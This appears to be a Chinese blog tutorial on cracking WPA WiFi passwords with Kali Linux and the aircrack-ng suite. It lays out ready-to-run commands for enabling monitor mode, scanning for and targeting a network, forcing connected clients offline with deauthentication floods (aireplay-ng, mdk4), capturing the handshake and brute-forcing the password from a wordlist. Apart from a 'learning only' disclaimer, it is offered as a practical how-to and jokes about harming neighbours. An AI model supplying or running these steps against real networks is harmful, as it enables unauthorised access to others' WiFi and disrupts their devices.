Kali Linux抓包破解WiFi
不会吧不会吧,不会真有人1202年还要破WiFi吧.jpg

声明:全文不提供Kali Linux系统安装教程 & 无线网卡购买与使用指南
本文仅用于学习交流,如作他用引发的后果一概与作者无关

文末有虚拟机安装使用教程参考

WiFi在连接时会有四次握手认证,而抓包就是抓取握手过程的密钥进行暴力破解。
给连接到WiFi的设备发送反认证攻击(deauth),在设备强制断开连接自动重连WiFi的过程中就能抓到握手包。

本文所出现注释:

[Channel] 为目标WiFi信道
[MAC] 为目标WiFi的MAC
[ClientMAC] 为当前连接该WiFi的客户端MAC

以及:全程请在root用户下运行命令。

抓包过程

Aircrack-ng 配置

  1. 终止影响 aircrack-ng 程序的进程
service network-manager stop
airmon-ng check kill
  1. 列出当前支持的无线网卡 airmon-ng

如果没有任何输出,表示无线网卡不支持监听模式或者物理问题(

  1. 激活网卡监听(monitor)模式
airmon-ng start wlan0

命令执行后网卡接口会变为 wlan0mon

扫描并抓包WiFi

扫描目标WiFi

airodump-ng wlan0mon

执行后会自动扫描并排序你周围的无线网络,部分参数介绍如图所示
上半部分为附近WiFi的列表,下半部分为附近WiFi当前有设备连接的列表。
当找到目标WiFi 记住MAC以及信道 后, Ctrl+C 终止扫描。

抓取握手包

airodump-ng -c [Channel] --bssid [MAC] -w /tmp/wittoy wlan0mon

-w 后内容为保存路径,可自定义

这里须记住连接上该WiFi的客户端MAC且Terminal保持抓包监听状态,不要关闭

强制客户端下线

攻击目标WiFi,使其目标下的客户端与设备重连,以此来抓取握手包

攻击目标WiFi

新建一个命令行窗口,这里有2种方式使客户端下线

Aireplay-ng(推荐)

aireplay-ng -0 30 -a [MAC] -c [ClientMAC] wlan0mon

MDK4

mdk4 wlan0mon d -S [MAC] -c [Channal]

可加上 -s 控制速度,单位 packets/sec
注意的是此方法过于暴力,请及时 Ctrl+C 停止迫害邻居.jpg


抓包 中的Terminal显示 [WPA handshake: xx:xx:xx:xx:xx:xx] 代表抓包成功。

如果你的系统自带字典的话可以用 Aireplay-ng 小跑一会儿热热身,但还是建议导出包使用EWSA等专业工具跑包(本文最后有提供)。

aircrack-ng -w [字典路径] [握手包路径]

此处表示已跑出密码,其密码为 12345678

关闭网卡监听

airmon-ng stop wlan0mon
service network-manager start

附:EWSA本人收录 Link
虚拟机安装使用可参考 用CDlinux破解WiFi


上次修改於 2021-08-20